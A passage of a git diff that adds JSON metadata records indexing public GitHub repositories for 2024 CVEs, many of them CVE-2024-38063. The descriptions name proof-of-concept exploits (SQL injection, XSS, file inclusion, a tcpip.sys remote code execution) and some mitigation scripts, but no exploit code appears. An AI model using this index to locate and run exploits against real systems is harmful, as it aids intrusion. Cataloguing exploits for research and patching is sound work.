true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37770.json b/2024/CVE-2024-37770.json new file mode 100644 index 0000000000..d5d93004e7 --- /dev/null +++ b/2024/CVE-2024-37770.json @@ -0,0 +1,33 @@ +[ + { + "id": 824660920, + "name": "CVE-2024-37770", + "full_name": "k3ppf0r\/CVE-2024-37770", + "owner": { + "login": "k3ppf0r", + "id": 63085409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63085409?v=4", + "html_url": "https:\/\/github.com\/k3ppf0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3ppf0r\/CVE-2024-37770", + "description": "CVE-2024-37770", + "fork": false, + "created_at": "2024-07-05T16:13:34Z", + "updated_at": "2024-07-22T06:49:45Z", + "pushed_at": "2024-07-09T07:21:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37791.json b/2024/CVE-2024-37791.json new file mode 100644 index 0000000000..c5cb9ecad4 --- /dev/null +++ b/2024/CVE-2024-37791.json @@ -0,0 +1,33 @@ +[ + { + "id": 817225951, + "name": "CVE-2024-37791", + "full_name": "czheisenberg\/CVE-2024-37791", + "owner": { + "login": "czheisenberg", + "id": 52897817, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52897817?v=4", + "html_url": "https:\/\/github.com\/czheisenberg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/czheisenberg\/CVE-2024-37791", + "description": "我的CVE-2024-37791", + "fork": false, + "created_at": "2024-06-19T09:16:30Z", + "updated_at": "2024-07-03T08:10:57Z", + "pushed_at": "2024-06-19T10:01:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37843.json b/2024/CVE-2024-37843.json new file mode 100644 index 0000000000..da1ed86162 --- /dev/null +++ b/2024/CVE-2024-37843.json @@ -0,0 +1,33 @@ +[ + { + "id": 816569374, + "name": "CVE-2024-37843-POC", + "full_name": "gsmith257-cyber\/CVE-2024-37843-POC", + "owner": { + "login": "gsmith257-cyber", + "id": 55564824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55564824?v=4", + "html_url": "https:\/\/github.com\/gsmith257-cyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gsmith257-cyber\/CVE-2024-37843-POC", + "description": "POC for CVE-2024-37843. Craft CMS time-based blind SQLi", + "fork": false, + "created_at": "2024-06-18T02:27:04Z", + "updated_at": "2024-11-13T08:51:10Z", + "pushed_at": "2024-06-18T04:20:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37888.json b/2024/CVE-2024-37888.json new file mode 100644 index 0000000000..ca69264c43 --- /dev/null +++ b/2024/CVE-2024-37888.json @@ -0,0 +1,50 @@ +[ + { + "id": 812924226, + "name": "CVE-2024-37888", + "full_name": "7Ragnarok7\/CVE-2024-37888", + "owner": { + "login": "7Ragnarok7", + "id": 35977703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35977703?v=4", + "html_url": "https:\/\/github.com\/7Ragnarok7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7Ragnarok7\/CVE-2024-37888", + "description": "XSS PoC\/Exploit for Open Link Plugin for CKEditor 4", + "fork": false, + "created_at": "2024-06-10T07:00:18Z", + "updated_at": "2024-08-27T19:12:43Z", + "pushed_at": "2024-06-20T08:40:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "7ragnarok7", + "ckeditor", + "cve", + "cve-2024-37888", + "cybersecurity", + "exploit", + "github", + "hack", + "hacking", + "openlink", + "opensource", + "poc", + "public", + "security", + "vulnerability", + "xss" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37889.json b/2024/CVE-2024-37889.json new file mode 100644 index 0000000000..e709bb7d02 --- /dev/null +++ b/2024/CVE-2024-37889.json @@ -0,0 +1,33 @@ +[ + { + "id": 816119624, + "name": "CVE-2024-37889", + "full_name": "uname-s\/CVE-2024-37889", + "owner": { + "login": "uname-s", + "id": 94480739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94480739?v=4", + "html_url": "https:\/\/github.com\/uname-s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uname-s\/CVE-2024-37889", + "description": null, + "fork": false, + "created_at": "2024-06-17T04:50:00Z", + "updated_at": "2024-06-17T05:36:53Z", + "pushed_at": "2024-06-17T05:36:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38036.json b/2024/CVE-2024-38036.json new file mode 100644 index 0000000000..19a4505fe8 --- /dev/null +++ b/2024/CVE-2024-38036.json @@ -0,0 +1,33 @@ +[ + { + "id": 843195399, + "name": "CVE-2024-38036", + "full_name": "hnytgl\/CVE-2024-38036", + "owner": { + "login": "hnytgl", + "id": 26022152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26022152?v=4", + "html_url": "https:\/\/github.com\/hnytgl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hnytgl\/CVE-2024-38036", + "description": "排查ipv6使用情况", + "fork": false, + "created_at": "2024-08-16T01:38:21Z", + "updated_at": "2024-08-16T01:44:31Z", + "pushed_at": "2024-08-16T01:44:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38041.json b/2024/CVE-2024-38041.json new file mode 100644 index 0000000000..c49e53578d --- /dev/null +++ b/2024/CVE-2024-38041.json @@ -0,0 +1,33 @@ +[ + { + "id": 831586036, + "name": "CVE-2024-38041", + "full_name": "varwara\/CVE-2024-38041", + "owner": { + "login": "varwara", + "id": 167913816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4", + "html_url": "https:\/\/github.com\/varwara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varwara\/CVE-2024-38041", + "description": "Kernel pointers copied to output user mode buffer with ioctl 0x22A014 in the appid.sys driver.", + "fork": false, + "created_at": "2024-07-21T02:29:18Z", + "updated_at": "2024-11-20T16:30:57Z", + "pushed_at": "2024-07-21T02:35:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3806.json b/2024/CVE-2024-3806.json new file mode 100644 index 0000000000..56fb9c761c --- /dev/null +++ b/2024/CVE-2024-3806.json @@ -0,0 +1,33 @@ +[ + { + "id": 798859489, + "name": "CVE-2024-3806-AND-CVE-2024-3807-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3806-AND-CVE-2024-3807-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3806-AND-CVE-2024-3807-Poc", + "description": "CVE-2024-3806: Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts CVE-2024-3807: Porto <= 7.1.0 - Authenticated (Contributor+) Local File Inclusion via Post Meta", + "fork": false, + "created_at": "2024-05-10T16:13:07Z", + "updated_at": "2024-08-09T05:21:42Z", + "pushed_at": "2024-05-10T17:58:19Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38063.json b/2024/CVE-2024-38063.json new file mode 100644 index 0000000000..22f28ccec7 --- /dev/null +++ b/2024/CVE-2024-38063.json @@ -0,0 +1,858 @@ +[ + { + "id": 842939338, + "name": "CVE-2024-38063", + "full_name": "diegoalbuquerque\/CVE-2024-38063", + "owner": { + "login": "diegoalbuquerque", + "id": 160813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160813?v=4", + "html_url": "https:\/\/github.com\/diegoalbuquerque", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diegoalbuquerque\/CVE-2024-38063", + "description": "mitigation script by disabling ipv6 of all interfaces", + "fork": false, + "created_at": "2024-08-15T12:41:01Z", + "updated_at": "2024-08-27T10:04:08Z", + "pushed_at": "2024-08-15T13:53:45Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843636100, + "name": "CVE-2024-38063-VB", + "full_name": "noradlb1\/CVE-2024-38063-VB", + "owner": { + "login": "noradlb1", + "id": 74623428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74623428?v=4", + "html_url": "https:\/\/github.com\/noradlb1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noradlb1\/CVE-2024-38063-VB", + "description": "CVE-2024-38063 VB", + "fork": false, + "created_at": "2024-08-17T01:11:12Z", + "updated_at": "2024-08-17T01:20:05Z", + "pushed_at": "2024-08-17T01:20:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843832661, + "name": "CVE-2024-38063-poc", + "full_name": "Sachinart\/CVE-2024-38063-poc", + "owner": { + "login": "Sachinart", + "id": 18497191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18497191?v=4", + "html_url": "https:\/\/github.com\/Sachinart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sachinart\/CVE-2024-38063-poc", + "description": "Note: I am not responsible for any bad act. This is written by Chirag Artani to demonstrate the vulnerability.", + "fork": false, + "created_at": "2024-08-17T14:58:36Z", + "updated_at": "2024-11-28T16:04:55Z", + "pushed_at": "2024-08-28T20:56:40Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 83, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 844272199, + "name": "cve-2024-38063", + "full_name": "p33d\/cve-2024-38063", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/cve-2024-38063", + "description": "Poc for cve-2024-38063 ", + "fork": false, + "created_at": "2024-08-18T22:24:43Z", + "updated_at": "2024-08-18T22:24:43Z", + "pushed_at": "2024-08-18T22:24:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844698787, + "name": "CVE-2024-38063-Remediation", + "full_name": "dweger-scripts\/CVE-2024-38063-Remediation", + "owner": { + "login": "dweger-scripts", + "id": 174140925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174140925?v=4", + "html_url": "https:\/\/github.com\/dweger-scripts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dweger-scripts\/CVE-2024-38063-Remediation", + "description": null, + "fork": false, + "created_at": "2024-08-19T19:44:37Z", + "updated_at": "2024-08-21T14:58:51Z", + "pushed_at": "2024-08-21T14:58:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844930990, + "name": "Disable-IPv6-CVE-2024-38063-Fix", + "full_name": "almogopp\/Disable-IPv6-CVE-2024-38063-Fix", + "owner": { + "login": "almogopp", + "id": 37026702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37026702?v=4", + "html_url": "https:\/\/github.com\/almogopp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/almogopp\/Disable-IPv6-CVE-2024-38063-Fix", + "description": "A PowerShell script to temporarily mitigate the CVE-2024-38063 vulnerability by disabling IPv6 on Windows systems. This workaround modifies the registry to reduce the risk of exploitation without needing the immediate installation of the official Microsoft KB update. Intended as a temporary fix", + "fork": false, + "created_at": "2024-08-20T08:48:08Z", + "updated_at": "2024-08-20T08:50:31Z", + "pushed_at": "2024-08-20T08:50:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846408465, + "name": "CVE-2024-38063", + "full_name": "Th3Tr1ckst3r\/CVE-2024-38063", + "owner": { + "login": "Th3Tr1ckst3r", + "id": 21149460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21149460?v=4", + "html_url": "https:\/\/github.com\/Th3Tr1ckst3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Th3Tr1ckst3r\/CVE-2024-38063", + "description": "CVE-2024-38063 research so you don't have to.", + "fork": false, + "created_at": "2024-08-23T06:28:03Z", + "updated_at": "2024-08-31T00:54:01Z", + "pushed_at": "2024-08-30T22:18:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [ + "cve-2024-38063", + "cve-2024-38063-poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846999955, + "name": "CVE-2024-38063-Research-Tool", + "full_name": "haroonawanofficial\/CVE-2024-38063-Research-Tool", + "owner": { + "login": "haroonawanofficial", + "id": 148648539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148648539?v=4", + "html_url": "https:\/\/github.com\/haroonawanofficial", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haroonawanofficial\/CVE-2024-38063-Research-Tool", + "description": "This is a functional proof of concept (PoC) for CVE-2024-38063. However, it's important to note that this CVE is theoretical and not exploitable in a real-world scenario. To enhance understanding for learners, I have developed a research tool that covers both past and newly reported TCP\/IP vulnerabilities in CVEs", + "fork": false, + "created_at": "2024-08-24T15:04:54Z", + "updated_at": "2024-11-19T05:55:14Z", + "pushed_at": "2024-08-26T06:18:08Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847061153, + "name": "CVE-2024-38063", + "full_name": "ynwarcs\/CVE-2024-38063", + "owner": { + "login": "ynwarcs", + "id": 108408574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4", + "html_url": "https:\/\/github.com\/ynwarcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2024-38063", + "description": "poc for CVE-2024-38063 (RCE in tcpip.sys)", + "fork": false, + "created_at": "2024-08-24T18:25:46Z", + "updated_at": "2024-11-28T06:19:48Z", + "pushed_at": "2024-08-27T12:22:39Z", + "stargazers_count": 630, + "watchers_count": 630, + "has_discussions": false, + "forks_count": 115, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 115, + "watchers": 630, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 848337529, + "name": "CVE-2024-38063", + "full_name": "patchpoint\/CVE-2024-38063", + "owner": { + "login": "patchpoint", + "id": 174953042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174953042?v=4", + "html_url": "https:\/\/github.com\/patchpoint", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patchpoint\/CVE-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-08-27T15:21:25Z", + "updated_at": "2024-11-09T00:58:09Z", + "pushed_at": "2024-08-27T17:48:16Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 848561863, + "name": "Windows-CVE-2024-38063", + "full_name": "PumpkinBridge\/Windows-CVE-2024-38063", + "owner": { + "login": "PumpkinBridge", + "id": 139355470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139355470?v=4", + "html_url": "https:\/\/github.com\/PumpkinBridge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PumpkinBridge\/Windows-CVE-2024-38063", + "description": "Windows TCP\/IP IPv6(CVE-2024-38063)", + "fork": false, + "created_at": "2024-08-28T01:46:44Z", + "updated_at": "2024-09-29T15:19:37Z", + "pushed_at": "2024-08-28T01:53:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848706606, + "name": "CVE-2024-38063-POC", + "full_name": "zenzue\/CVE-2024-38063-POC", + "owner": { + "login": "zenzue", + "id": 19271340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19271340?v=4", + "html_url": "https:\/\/github.com\/zenzue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zenzue\/CVE-2024-38063-POC", + "description": "potential memory corruption vulnerabilities in IPv6 networks.", + "fork": false, + "created_at": "2024-08-28T08:57:23Z", + "updated_at": "2024-11-05T16:15:14Z", + "pushed_at": "2024-08-28T09:02:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848885997, + "name": "CVE-2024-38063-", + "full_name": "AdminPentester\/CVE-2024-38063-", + "owner": { + "login": "AdminPentester", + "id": 179179494, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179179494?v=4", + "html_url": "https:\/\/github.com\/AdminPentester", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdminPentester\/CVE-2024-38063-", + "description": "Remotely Exploiting The Kernel Via IPv6", + "fork": false, + "created_at": "2024-08-28T15:28:14Z", + "updated_at": "2024-08-30T01:27:19Z", + "pushed_at": "2024-08-30T01:27:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850339397, + "name": "CVE-2024-38063", + "full_name": "ThemeHackers\/CVE-2024-38063", + "owner": { + "login": "ThemeHackers", + "id": 107047730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-38063", + "description": "CVE-2024-38063 is a critical security vulnerability in the Windows TCP\/IP stack that allows for remote code execution (RCE)", + "fork": false, + "created_at": "2024-08-31T13:56:26Z", + "updated_at": "2024-11-24T20:48:28Z", + "pushed_at": "2024-11-24T10:59:13Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850609409, + "name": "CVE-2024-38063_PoC", + "full_name": "KernelKraze\/CVE-2024-38063_PoC", + "owner": { + "login": "KernelKraze", + "id": 82752974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82752974?v=4", + "html_url": "https:\/\/github.com\/KernelKraze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KernelKraze\/CVE-2024-38063_PoC", + "description": "This is a C language program designed to test the Windows TCP\/IP Remote Code Execution Vulnerability (CVE-2024-38063). It sends specially crafted IPv6 packets with embedded shellcode to exploit the vulnerability.", + "fork": false, + "created_at": "2024-09-01T09:20:02Z", + "updated_at": "2024-11-23T08:17:09Z", + "pushed_at": "2024-09-08T07:12:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851150728, + "name": "cve-2024-38063", + "full_name": "ps-interactive\/cve-2024-38063", + "owner": { + "login": "ps-interactive", + "id": 35313392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35313392?v=4", + "html_url": "https:\/\/github.com\/ps-interactive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ps-interactive\/cve-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-09-02T14:16:31Z", + "updated_at": "2024-09-02T14:16:55Z", + "pushed_at": "2024-09-02T14:16:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 851683675, + "name": "Cve-2024-38063", + "full_name": "Brownpanda29\/Cve-2024-38063", + "owner": { + "login": "Brownpanda29", + "id": 147920175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147920175?v=4", + "html_url": "https:\/\/github.com\/Brownpanda29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Brownpanda29\/Cve-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-09-03T14:36:35Z", + "updated_at": "2024-09-03T14:59:43Z", + "pushed_at": "2024-09-03T14:59:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 853823211, + "name": "quick-fix-cve-2024-38063", + "full_name": "FrancescoDiSalesGithub\/quick-fix-cve-2024-38063", + "owner": { + "login": "FrancescoDiSalesGithub", + "id": 17337009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17337009?v=4", + "html_url": "https:\/\/github.com\/FrancescoDiSalesGithub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FrancescoDiSalesGithub\/quick-fix-cve-2024-38063", + "description": "quick powershell script to fix cve-2024-38063", + "fork": false, + "created_at": "2024-09-07T16:27:27Z", + "updated_at": "2024-09-08T08:59:32Z", + "pushed_at": "2024-09-08T08:59:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blueteam", + "cve-2024-38063", + "fix", + "powershell", + "script", + "workaround" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855027111, + "name": "CVE-2024-38063", + "full_name": "Faizan-Khanx\/CVE-2024-38063", + "owner": { + "login": "Faizan-Khanx", + "id": 156709479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156709479?v=4", + "html_url": "https:\/\/github.com\/Faizan-Khanx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Faizan-Khanx\/CVE-2024-38063", + "description": "CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6", + "fork": false, + "created_at": "2024-09-10T07:15:20Z", + "updated_at": "2024-09-10T12:34:53Z", + "pushed_at": "2024-09-10T10:19:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 860985934, + "name": "CVE-2024-38063-Medium", + "full_name": "ArenaldyP\/CVE-2024-38063-Medium", + "owner": { + "login": "ArenaldyP", + "id": 134998695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134998695?v=4", + "html_url": "https:\/\/github.com\/ArenaldyP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArenaldyP\/CVE-2024-38063-Medium", + "description": "Kode Eksploitasi CVE-2024-38063", + "fork": false, + "created_at": "2024-09-21T17:33:52Z", + "updated_at": "2024-09-22T16:03:48Z", + "pushed_at": "2024-09-22T16:03:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 861711766, + "name": "cve-2024-38063", + "full_name": "lnx-dvlpr\/cve-2024-38063", + "owner": { + "login": "lnx-dvlpr", + "id": 169969340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169969340?v=4", + "html_url": "https:\/\/github.com\/lnx-dvlpr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnx-dvlpr\/cve-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-09-23T11:45:42Z", + "updated_at": "2024-09-25T12:01:17Z", + "pushed_at": "2024-09-25T12:01:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869344169, + "name": "CVE-2024-38063", + "full_name": "becrevex\/CVE-2024-38063", + "owner": { + "login": "becrevex", + "id": 8326868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8326868?v=4", + "html_url": "https:\/\/github.com\/becrevex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/becrevex\/CVE-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-10-08T06:24:54Z", + "updated_at": "2024-11-18T05:45:15Z", + "pushed_at": "2024-11-16T06:07:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872589341, + "name": "CVE-2024-38063", + "full_name": "idkwastaken\/CVE-2024-38063", + "owner": { + "login": "idkwastaken", + "id": 180330197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180330197?v=4", + "html_url": "https:\/\/github.com\/idkwastaken", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/idkwastaken\/CVE-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-10-14T17:46:58Z", + "updated_at": "2024-10-14T17:59:59Z", + "pushed_at": "2024-10-14T17:59:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872765524, + "name": "CVE-2024-38063", + 